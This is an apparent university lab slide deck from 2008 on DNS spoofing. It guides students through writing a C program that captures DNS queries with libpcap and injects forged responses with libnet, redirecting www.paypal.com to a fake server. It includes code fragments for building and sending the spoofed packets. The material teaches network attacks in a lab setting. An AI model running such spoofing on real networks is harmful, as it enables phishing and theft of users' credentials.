Lab SSL Security Attack

Document Sample
Lab SSL Security Attack Powered By Docstoc
					Lab 2: SSL Security Attack

       June 17, 2008

        Hyun Jin Kim
                   Objective
• Configure DNS such that
  https://www.paypal.com gets resolved to our
  own IP address of the “attack” server
  – Paypal uses SSL protocol.
Normal DNS Query Processing


 www.paypal.com
                            DNS Server

                  64.4.241.33




                                         Paypal’s Server
    Attacking DNS Request

                    Filter

www.paypal.com                                  DNS Server

                 128.222.11.3




                                                             Paypal Server
                                Fake Paypal Server
            What We Will Do
• Write a program that injects a spoofed DNS
  Response when the source queries the IP
  address of www.paypal.com
• C programming
• Basic skeleton of codes are provided.
• Attacker’s fake server is also provided.
                    Libraries
• Libpcap
  – To capture DNS requests
  – /usr/include/pcap.h
• Libnet
  – To inject fake DNS replies
  – /usr/include/libnet.h
                Procedures
• Setup for packet sniffing
• Grab packets
• Check if packets are DNS queries
• If the query is for www.paypal.com, inject a
  spoofed DNS response back
• Web browser will direct to attacker’s fake
  paypal website!
     Step 1: Packet Sniffing Setup
• Find the network interface for sniffing
  – device = pcap_lookupdev(errbuf);
     • eth0 in our case
• Set up for sniffing
  – capdev = set_cap_dev(device,
    filter);
     • filter specifies some properties of DNS Requests
        – UDP packets
        – Destination port = 53
  Step 2: Grab a DNS Query Packet
• Grab a packet (first fill-in)‫‏‬
   – packet = (u_char *)
     pcap_next(capdev, &pcap_hdr);
• Check if the packet is a DNS Query
   – i.e., Destination port = 53?
• Check if the DNS Query is for www.paypal.com
Step 3: Create Spoofed DNS Response
• Create a new DNS Response with Attacker’s IP
  address
• Send it back to the source
• void spoof_dns(char *device)‫‏‬
  – Open a raw socket
  – Start creating the header for the spoofed response
Step 3: Create Spoofed DNS Response
• Header Construction
  –       Build DNS Header (fill in)‫‏‬
  –       dns = libnet_build_dnsv4(LIBNET_DNS_H,              /* header size   */
                       ntohs(spoofpacket.dns_id), /* dns id          */
                       0x8100,           /* control flags (QR,AA,RD,*/
                            1,                /* number of questions      */
                            1,                /* number of answer RR's    */
                       0,                /* number of authority RR's*/
                       0,                /* number of additional RR's*/
                       spoofpacket.payload,      /* payload           */
                       spoofpacket.payload_size, /* payload length    */
                       handler,                  /* libnet handler    */
                            0);                       /* ptag         */

  –       Build UDP Header

  –       Build IP Header

  –       Calculate Checksum (fill in)‫‏‬
      •       libnet_toggle_checksum(handler, udp, 1);
      •       libnet_toggle_checksum(handler, ip, 1);
     Step 4: Inject DNS Response
• Inject the packet (fill in)‫‏‬
   – inject_size = libnet_write(handler);

• Destroy the packet (fill in)‫‏‬
   – libnet_destroy (handler);
                       Test
• Compile
  – Type make
• Run
  – Type ./sslattack
• Open a web browser
• Type http://www.naver.com
  – No attack
• Type https://www.paypal.com
  – Certificate Warning Sign
Certificate
Spoofed paypal.com
Actual paypal.com

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:10
posted:5/24/2011
language:English
pages:16